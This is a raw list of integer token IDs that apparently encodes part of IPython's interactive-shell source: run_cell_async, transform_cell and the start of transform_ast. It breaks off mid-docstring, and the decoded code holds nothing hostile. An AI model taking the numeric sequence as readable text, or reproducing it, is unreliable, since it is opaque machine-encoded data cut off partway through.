29291, 63, 287, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 6101, 7535, 767, 13, 1558, 290, 2029, 33283, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2129, 8344, 341, 20361, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8931, 5715, 28, 17, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1267, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 796, 2116, 13, 35636, 62, 3846, 7, 1831, 62, 3846, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 35528, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 597, 6631, 1141, 6121, 481, 307, 4376, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3161, 284, 9706, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 10352, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 796, 14434, 62, 3846, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 4808, 21754, 62, 1350, 62, 292, 13361, 7, 3846, 8, 628, 220, 220, 220, 30351, 825, 1057, 62, 3846, 62, 292, 13361, 7, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 11, 198, 220, 220, 220, 220, 220, 220, 220, 8246, 62, 3846, 25, 965, 11, 198, 220, 220, 220, 220, 220, 220, 220, 3650, 62, 23569, 28, 25101, 11, 198, 220, 220, 220, 220, 220, 220, 220, 10574, 28, 25101, 11, 198, 220, 220, 220, 220, 220, 220, 220, 7582, 62, 69, 315, 942, 28, 17821, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1635, 11, 198, 220, 220, 220, 220, 220, 220, 220, 14434, 62, 3846, 25, 32233, 58, 2536, 60, 796, 6045, 11, 198, 220, 220, 220, 220, 220, 220, 220, 662, 36948, 62, 41194, 62, 83, 29291, 25, 32233, 58, 7149, 60, 796, 6045, 198, 220, 220, 220, 1267, 4613, 37497, 23004, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 10987, 257, 1844, 6101, 7535, 2685, 355, 24871, 3481, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 8246, 62, 3846, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 2438, 357, 8201, 6101, 7535, 2438, 884, 355, 4064, 32707, 5499, 8, 284, 1057, 13, 198, 220, 220, 220, 220, 220, 220, 220, 3650, 62, 23569, 1058, 20512, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 262, 8246, 290, 14251, 2685, 481, 307, 8574, 287, 6101, 7535, 338, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2106, 13, 1114, 2836, 2438, 4585, 736, 656, 6101, 7535, 338, 20230, 11, 428, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 815, 307, 900, 284, 10352, 13, 198, 220, 220, 220, 220, 220, 220, 220, 10574, 1058, 20512, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 3368, 1735, 12, 34435, 11, 884, 355, 16992, 3359, 25480, 82, 290, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 290, 18931, 13, 220, 10574, 28, 17821, 3386, 3650, 62, 23569, 28, 25101, 13, 198, 220, 220, 220, 220, 220, 220, 220, 7582, 62, 69, 315, 942, 1058, 20512, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 262, 2438, 481, 2648, 2003, 6299, 351, 262, 14333, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7582, 13, 632, 481, 1111, 307, 5676, 416, 2180, 11593, 37443, 834, 17944, 11, 290, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 597, 11593, 37443, 834, 17944, 287, 262, 2438, 481, 2689, 262, 7582, 13, 1002, 10352, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 11593, 37443, 834, 17944, 389, 407, 4888, 287, 2035, 4571, 13, 198, 220, 220, 220, 220, 220, 220, 220, 14434, 62, 3846, 25, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 326, 373, 3804, 832, 6121, 364, 198, 220, 220, 220, 220, 220, 220, 220, 662, 36948, 62, 41194, 62, 83, 29291, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 12854, 611, 262, 13389, 4054, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 198, 220, 220, 220, 220, 220, 220, 220, 35656, 198, 220, 220, 220, 220, 220, 220, 220, 1255, 1058, 1058, 4871, 25, 63, 23002, 1009, 23004, 63, 628, 220, 220, 220, 220, 220, 220, 220, 11485, 2196, 29373, 25, 767, 13, 15, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 7508, 796, 37497, 12360, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8246, 62, 3846, 11, 3650, 62, 23569, 11, 10574, 11, 7582, 62, 69, 315, 942, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1255, 796, 37497, 23004, 7, 10951, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 357, 1662, 8246, 62, 3846, 8, 393, 8246, 62, 3846, 13, 747, 10223, 33529, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12957, 62, 18558, 1009, 62, 82, 1229, 2707, 276, 796, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12957, 62, 18558, 1009, 62, 20274, 796, 1255, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 1255, 628, 220, 220, 220, 220, 220, 220, 220, 611, 10574, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3650, 62, 23569, 796, 10352, 628, 220, 220, 220, 220, 220, 220, 220, 611, 3650, 62, 23569, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1255, 13, 18558, 1009, 62, 9127, 796, 2116, 13, 18558, 1009, 62, 9127, 628, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 31534, 13, 46284, 10786, 3866, 62, 41049, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 611, 407, 10574, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 31534, 13, 46284, 10786, 3866, 62, 5143, 62, 3846, 3256, 7508, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 14434, 62, 3846, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 14601, 13, 40539, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 63, 5143, 62, 3846, 62, 292, 13361, 63, 481, 407, 869, 4600, 35636, 62, 3846, 63, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 6338, 287, 262, 2003, 13, 4222, 1208, 262, 1255, 284, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 4600, 7645, 12214, 62, 3846, 63, 4578, 290, 597, 6631, 326, 1645, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 1141, 262, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 35636, 287, 4600, 3866, 36948, 62, 41194, 62, 83, 29291, 63, 287, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 6101, 7535, 767, 13, 1558, 290, 2029, 33283, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2129, 8344, 341, 20361, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8931, 5715, 28, 17, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1267, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1002, 597, 286, 674, 5128, 13389, 357, 15414, 62, 7645, 16354, 62, 37153, 393, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 7694, 346, 353, 62, 37153, 8, 12073, 281, 6631, 11, 356, 3650, 340, 287, 428, 7885, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 523, 326, 356, 460, 3359, 262, 4049, 706, 18931, 262, 5128, 290, 23069, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 340, 287, 262, 2106, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 796, 2116, 13, 35636, 62, 3846, 7, 1831, 62, 3846, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 35528, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 662, 36948, 62, 41194, 62, 83, 29291, 796, 25064, 13, 41194, 62, 10951, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 796, 8246, 62, 3846, 220, 1303, 2685, 468, 284, 2152, 523, 340, 460, 307, 8574, 14, 6404, 2004, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 662, 36948, 62, 41194, 62, 83, 29291, 796, 6045, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 662, 36948, 62, 41194, 62, 83, 29291, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 796, 14434, 62, 3846, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 796, 8246, 62, 3846, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 9363, 8246, 290, 13686, 2106, 198, 220, 220, 220, 220, 220, 220, 220, 611, 3650, 62, 23569, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 23569, 62, 37153, 13, 8095, 62, 15414, 82, 7, 944, 13, 18558, 1009, 62, 9127, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 11, 8246, 62, 3846, 8, 198, 220, 220, 220, 220, 220, 220, 220, 611, 407, 10574, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 6404, 1362, 13, 6404, 7, 3846, 11, 8246, 62, 3846, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 16531, 262, 6631, 611, 5128, 7587, 4054, 13, 198, 220, 220, 220, 220, 220, 220, 220, 611, 662, 36948, 62, 41194, 62, 83, 29291, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12860, 40546, 1891, 7, 3866, 36948, 62, 41194, 62, 83, 29291, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 3650, 62, 23569, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 18558, 1009, 62, 9127, 15853, 352, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 4049, 62, 19052, 62, 18558, 7, 3866, 36948, 62, 41194, 62, 83, 29291, 58, 16, 12962, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 3954, 898, 17050, 18140, 262, 11593, 37443, 834, 2858, 13, 1002, 356, 765, 284, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 1057, 2438, 351, 257, 4553, 11593, 37443, 834, 2858, 11, 779, 262, 4277, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 17050, 198, 220, 220, 220, 220, 220, 220, 220, 17050, 796, 2116, 13, 5589, 576, 611, 7582, 62, 69, 315, 942, 2073, 2116, 13, 5589, 5329, 62, 4871, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 4808, 5143, 62, 292, 13361, 796, 10352, 628, 220, 220, 220, 220, 220, 220, 220, 351, 2116, 13, 18780, 259, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 62, 3672, 796, 2116, 13, 5589, 576, 13, 23870, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 11, 2116, 13, 18558, 1009, 62, 9127, 11, 8246, 62, 8189, 28, 1831, 62, 3846, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1267, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 2116, 13, 13812, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 3082, 576, 284, 18022, 8189, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 25064, 13, 9641, 62, 10951, 1279, 357, 18, 11, 23, 8, 290, 2116, 13, 23736, 707, 4548, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 4808, 21754, 62, 1350, 62, 292, 13361, 7, 3846, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 262, 2438, 29273, 2174, 481, 407, 307, 2836, 2438, 25, 356, 14441, 340, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 287, 281, 4600, 292, 13361, 825, 44646, 770, 481, 1884, 787, 617, 29273, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 47385, 2174, 2051, 617, 6121, 3663, 290, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 10400, 257, 1402, 40204, 284, 1057, 62, 8189, 357, 259, 543, 356, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 28450, 617, 14895, 286, 644, 4808, 459, 62, 292, 13361, 1958, 5860, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 484, 389, 2842, 1088, 357, 2339, 38455, 278, 636, 286, 262, 6468, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1568, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 532, 3423, 11, 1441, 2438, 62, 459, 13, 2618, 58, 15, 4083, 2618, 58, 16, 21912, 16, 4357, 355, 880, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 355, 938, 5408, 287, 220, 1441, 2643, 543, 318, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 262, 2836, 2438, 636, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 532, 3914, 340, 467, 832, 262, 29273, 6121, 364, 11, 290, 38455, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 532, 340, 736, 706, 262, 29273, 6121, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 887, 326, 1283, 24673, 11, 379, 1551, 981, 356, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 466, 407, 761, 340, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 62, 459, 796, 4808, 459, 62, 292, 13361, 1958, 7, 3846, 11, 705, 292, 13361, 12, 4299, 12, 48553, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4808, 5143, 62, 292, 13361, 796, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 62, 459, 796, 17050, 13, 459, 62, 29572, 7, 3846, 11, 29472, 28, 3846, 62, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 62, 459, 796, 17050, 13, 459, 62, 29572, 7, 3846, 11, 29472, 28, 3846, 62, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 2116, 13, 23144, 62, 1069, 11755, 355, 304, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 304, 4906, 11, 1988, 11, 256, 65, 796, 25064, 13, 41194, 62, 10951, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 15022, 22737, 7, 2963, 431, 11, 1988, 11, 256, 65, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 4049, 62, 19052, 62, 18558, 7, 68, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 1423, 298, 341, 12331, 355, 304, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12860, 521, 298, 341, 18224, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 4049, 62, 19052, 62, 18558, 7, 68, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 357, 5886, 11125, 12331, 11, 26375, 897, 12331, 11, 11052, 12331, 11, 5994, 12331, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 14059, 12331, 8, 355, 304, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 49596, 33567, 897, 18224, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 4049, 62, 19052, 62, 18558, 7, 68, 8, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 27967, 29273, 38226, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2438, 62, 459, 796, 2116, 13, 35636, 62, 459, 7, 8189, 62, 459, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 23412, 3041, 35408, 355, 304, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12860, 40546, 1891, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 4049, 62, 19052, 62, 18558, 7, 68, 8, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 13786, 262, 3359, 25480, 257, 4941, 284, 674, 37497, 23004, 523, 340, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 460, 6070, 287, 262, 5072, 1988, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 13812, 25480, 13, 18558, 62, 20274, 796, 1255, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 8393, 1133, 262, 2836, 2438, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9427, 3458, 796, 366, 23108, 1, 611, 10574, 2073, 2116, 13, 459, 62, 17440, 62, 3849, 21797, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 4808, 5143, 62, 292, 13361, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9427, 3458, 796, 705, 292, 13361, 6, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 468, 62, 49309, 796, 25507, 2116, 13, 5143, 62, 459, 62, 77, 4147, 7, 8189, 62, 459, 13, 2618, 11, 2685, 62, 3672, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9427, 3458, 28, 3849, 21797, 11, 17050, 28, 5589, 5329, 11, 1255, 28, 20274, 8, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12957, 62, 18558, 1009, 62, 82, 1229, 2707, 276, 796, 407, 468, 62, 49309, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12957, 62, 18558, 1009, 62, 20274, 796, 1255, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 30027, 428, 523, 1568, 9066, 3815, 466, 407, 13096, 262, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 37497, 23004, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 13812, 25480, 13, 18558, 62, 20274, 796, 6045, 628, 220, 220, 220, 220, 220, 220, 220, 611, 3650, 62, 23569, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 19430, 5072, 284, 262, 6831, 13, 8314, 2147, 4556, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 2106, 5072, 18931, 318, 9343, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 23569, 62, 37153, 13, 8095, 62, 22915, 7, 944, 13, 18558, 1009, 62, 9127, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 5501, 2685, 318, 257, 1635, 29762, 9, 5128, 11, 7692, 286, 703, 867, 3951, 340, 468, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 18558, 1009, 62, 9127, 15853, 352, 628, 220, 220, 220, 220, 220, 220, 220, 1441, 1255, 628, 220, 220, 220, 825, 6121, 62, 3846, 7, 944, 11, 8246, 62, 3846, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 41762, 281, 5128, 2685, 878, 32096, 340, 13, 628, 220, 220, 220, 220, 220, 220, 220, 36125, 38226, 11, 9177, 287, 6101, 7535, 13, 7295, 13, 15414, 7645, 16354, 17, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1730, 351, 1243, 588, 7559, 4, 32707, 15506, 290, 7559, 0, 10057, 15506, 9729, 13, 198, 220, 220, 220, 220, 220, 220, 220, 2312, 1057, 319, 477, 5128, 13, 198, 220, 220, 220, 220, 220, 220, 220, 26977, 38226, 11, 329, 1243, 588, 555, 3798, 5813, 2153, 873, 290, 262, 8420, 198, 220, 220, 220, 220, 220, 220, 220, 1960, 420, 439, 11, 4745, 319, 262, 1181, 286, 262, 28846, 13, 198, 220, 220, 220, 220, 220, 220, 220, 2312, 691, 4174, 284, 2060, 1627, 17311, 13, 628, 220, 220, 220, 220, 220, 220, 220, 2312, 4731, 12, 3106, 38226, 389, 3940, 416, 29273, 38226, 26, 198, 220, 220, 220, 220, 220, 220, 220, 766, 1058, 76, 2788, 25, 63, 35636, 62, 459, 44646, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 36125, 5128, 38226, 198, 220, 220, 220, 220, 220, 220, 220, 2685, 796, 2116, 13, 15414, 62, 7645, 16354, 62, 37153, 13, 35636, 62, 3846, 7, 1831, 62, 3846, 8, 628, 220, 220, 220, 220, 220, 220, 220, 611, 18896, 7, 3846, 13, 35312, 6615, 28955, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 26977, 38226, 532, 691, 5625, 329, 2060, 1627, 9729, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 2116, 13, 18780, 259, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 779, 7694, 346, 353, 62, 6615, 284, 5412, 25462, 649, 6615, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 11169, 25462, 649, 1370, 329, 6468, 13, 29572, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2685, 796, 2116, 13, 3866, 24455, 62, 37153, 13, 3866, 24455, 62, 6615, 7, 3846, 8, 1343, 705, 59, 77, 6, 628, 220, 220, 220, 220, 220, 220, 220, 3951, 796, 2685, 13, 35312, 6615, 7, 14894, 2412, 28, 17821, 8, 198, 220, 220, 220, 220, 220, 220, 220, 329, 6121, 287, 2116, 13, 15414, 62, 35636, 364, 62, 7353, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3951, 796, 6121, 7, 6615, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2685, 796, 705, 4458, 22179, 7, 6615, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1441, 2685, 628, 220, 220, 220, 825, 6121, 62, 459, 7, 944, 11, 10139, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 44836, 262, 29273, 38226, 422, 2116, 13, 459, 62, 35636, 364, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 10139, 1058, 6468, 13, 19667, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 6808, 10139, 284, 307, 14434, 13, 27095, 1444, 351, 262, 6468, 13, 26796, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4635, 416, 32096, 2836, 5128, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 198, 220, 220, 220, 220, 220, 220, 220, 35656, 198, 220, 220, 220, 220, 220, 220, 220, 1052, 6468, 13, 19667, 11188, 